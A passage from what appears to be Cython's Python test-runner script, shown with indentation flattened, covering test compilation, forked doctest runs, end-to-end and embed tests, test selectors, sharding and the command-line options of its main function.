workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
if self.doctest_selector is not None:
tests._tests[:] = [test for test in tests._tests if self.doctest_selector(test.id())]
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file = os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
excludelist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in excludelist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None, capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res == 0 and b'REFNANNY: ' in _out:
res = -1
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = os.path.abspath(os.path.join('..', '..', 'cython.py'))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
# just re-use the FileListExclude implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, module_name in deps.items():
try:
module = __import__(module_name)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
print("Test dependency not found: '%s'" % module_name)
else:
version = self.find_dep_version(module_name, module)
print("Test dependency found: '%s' version %s" % (module_name, version))
self.tests_missing_deps = []
def find_dep_version(self, name, module):
try:
version = module.__version__
except AttributeError:
stdlib_dir = os.path.dirname(shutil.__file__) + os.sep
module_path = getattr(module, '__file__', stdlib_dir) # no __file__? => builtin stdlib module
if module_path.startswith(stdlib_dir):
# stdlib module
version = sys.version.partition(' ')[0]
elif '.' in name:
# incrementally look for a parent package with version
name = name.rpartition('.')[0]
return self.find_dep_version(name, __import__(name))
else:
version = '?.?'
return version
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-k", dest="only_pattern",
help="a regex pattern for selecting doctests and test functions in the test modules")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture and not options.for_debugging:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
